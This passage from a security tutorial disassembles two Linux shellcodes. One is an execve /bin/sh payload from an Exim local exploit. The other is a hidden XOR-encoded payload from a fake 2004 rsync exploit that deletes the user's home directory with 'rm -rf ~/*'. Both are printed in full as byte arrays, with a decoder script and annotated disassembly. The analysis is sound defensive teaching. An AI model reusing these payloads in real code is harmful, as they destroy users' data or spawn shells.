One last point that deserves attention is the importance of disassembling shellcodes, both to learn new techniques and to be sure about what they do before executing them.
For instance, let's take a look at the shellcode from the exploit, made available by Rafael San Miguel Carrasco, exploiting a local buffer overflow vulnerability of the Exim MTA (releases 4.40 through 4.43).
static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89" "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e" "\x2f\x73\x68\x58";
Let's disassemble it with ndisasm; by now, we expect to see something familiar:
$ echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"\ > "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"\ > "\x2f\x73\x68\x58" | ndisasm -u - 00000000 EB17 jmp short 0x19 ; Initial jump to the CALL 00000002 5E pop esi ; Store the address of the string in ESI 00000003 897608 mov [esi+0x8],esi ; Write the address of the string in ESI + 8 00000006 31C0 xor eax,eax ; Zero out EAX 00000008 884607 mov [esi+0x7],al ; Null-terminate the string 0000000B 89460C mov [esi+0xc],eax ; Write the null pointer to ESI + 12 0000000E B00B mov al,0xb ; Number of the execve(2) syscall 00000010 89F3 mov ebx,esi ; Store the address of the string in EBX (first argument) 00000012 8D4E08 lea ecx,[esi+0x8] ; Second argument (pointer to the array) 00000015 31D2 xor edx,edx ; Zero out EDX (third argument) 00000017 CD80 int 0x80 ; Execute the syscall 00000019 E8E4FFFFFF call 0x2 ; Push the address of the string and jump to the second ; instruction 0000001E 2F das ; "/bin/shX" 0000001F 62696E bound ebp,[ecx+0x6e] 00000022 2F das 00000023 7368 jnc 0x8d 00000025 58 pop eax $
It's always a good habit to examine a shellcode before executing it. For example, on the 28 May 2004, a prankster posted on full-disclosure what he asserted was a public exploit for a rsync vulnerability. However, the code was weird: after a first, well-commented shellcode, there was a second, less visible shellcode:
[...] char shellcode2[] = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" "\x7b\x35"; [...]
On top of that, after a brief look at the main() of the exploit, it was easy to spot that the latter shellcode was executed locally:
(long) funct = &shellcode2; [...] funct();
Therefore, if we want to know what the shellcode actually does, we can do nothing but disassemble it:
$ echo -ne "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8[...]" | ndisasm -u - 00000000 EB10 jmp short 0x12 ; Jum to the CALL 00000002 5E pop esi ; Retrieve the address of byte 0x17 00000003 31C9 xor ecx,ecx ; Zero out ECX 00000005 B14B mov cl,0x4b ; Setup the loop counter (see insctruction 0x0E) 00000007 B0FF mov al,0xff ; Setup the XOR mask 00000009 3006 xor [esi],al ; XOR byte 0x17 with AL 0000000B FEC8 dec al ; Decrease the XOR mask 0000000D 46 inc esi ; Load the address of the next byte 0000000E E2F9 loop 0x9 ; Keep XORing until ECX=0 00000010 EB05 jmp short 0x17 ; Jump to the first XORed instruction 00000012 E8EBFFFFFF call 0x2 ; PUSH the address of the next byte and jump to the second instruction 00000017 17 pop ss [...]
As you can see, it's a self-modifying shellcode: instructions from 0x17 to 0x17 + 0x4B are decoded at run-time by XORing them with the value of AL (which is initially 0xFF and then decreases at each loop iteration). Once decoded, instructions are executed (jmp short 0x17). So let's try to understand which instructions will actually be executed. We can easily decode the shellcode using our beloved python:
#!/usr/bin/env python sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" + \ "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \ "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \ "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \ "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \ "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \ "\x7b\x35" print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
hexdump can already give us a first idea:
$ ./decode.py | hexdump -C 00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |è%.../bin/sh.sh.| 00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>| 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1ÀP.]| 00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S.ë.á1Ó| 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 |°.Í..Ã1À@Í.| 0000004c
Mmmh... "/bin/sh", "sh -c rm -rf ~/* 2>/dev/null"... This doesn't look good... But let's disassemble it to be sure!
$ ./decode.py | ndisasm -u - 00000000 E825000000 call 0x2a 00000005 2F das 00000006 62696E bound ebp,[ecx+0x6e] 00000009 2F das 0000000A 7368 jnc 0x74 0000000C 007368 add [ebx+0x68],dh 0000000F 002D6300726D add [0x6d720063],ch 00000015 202D7266207E and [0x7e206672],ch 0000001B 2F das 0000001C 2A20 sub ah,[eax] 0000001E 323E xor bh,[esi] 00000020 2F das 00000021 6465762F gs jna 0x54 00000025 6E outsb 00000026 756C jnz 0x94 00000028 6C insb 00000029 005D31 add [ebp+0x31],bl [...]
The first instruction is a CALL, immediately followed by the strings displayed by hexdump. The beginning of the shellcode could be re-written this way:
E825000000 call 0x2a 2F62696E2F736800 db "/bin/sh" 736800 db "sh" 2D6300 db "-c" 726d202D7266207E2F2A20323E2F6465762F6E756C6C00 db "rm -rf ~/* 2>/dev/null" 5D pop ebp [...]
Let's examine the called function, keeping only the opcodes starting at the instruction 0x2a (42):
$ ./decode_exp.py | cut -c 43- | ndisasm -u - 00000000 5D pop ebp ; Retrieve the address of the string "/bin/sh" 00000001 31C0 xor eax,eax ; Zero out EAX 00000003 50 push eax ; Push the null pointer onto the stack 00000004 8D5D0E lea ebx,[ebp+0xe] ; Store the address of "rm -rf ~/* 2>/dev/null" in EBX 00000007 53 push ebx ; and push it on the stack 00000008 8D5D0B lea ebx,[ebp+0xb] ; Store the address of "-c" in EBX 0000000B 53 push ebx ; and push it on the stack 0000000C 8D5D08 lea ebx,[ebp+0x8] ; Store the address of "sh" in EBX 0000000F 53 push ebx ; and push it on the stack 00000010 89EB mov ebx,ebp ; Store the address of "/bin/sh" in EBX (first arg to execve()) 00000012 89E1 mov ecx,esp ; Store the stack pointer to ECX (ESP points to"sh", "-c", "rm...") 00000014 31D2 xor edx,edx ; Third arg to execve() 00000016 B00B mov al,0xb ; Number of the execve() syscall 00000018 CD80 int 0x80 ; Execute the syscall 0000001A 89C3 mov ebx,eax ; Store 0xb in EBX (exit code=11) 0000001C 31C0 xor eax,eax ; Zero out EAX 0000001E 40 inc eax ; EAX=1 (number of the exit() syscall) 0000001F CD80 int 0x80 ; Execute the syscall
As you can see, it's an execve(2) syscall with the array "sh", "-c", "rm -rf ~/* 2>/dev/null" as the second argument. Needless to repeat that you should always analyse a shellcode before executing it!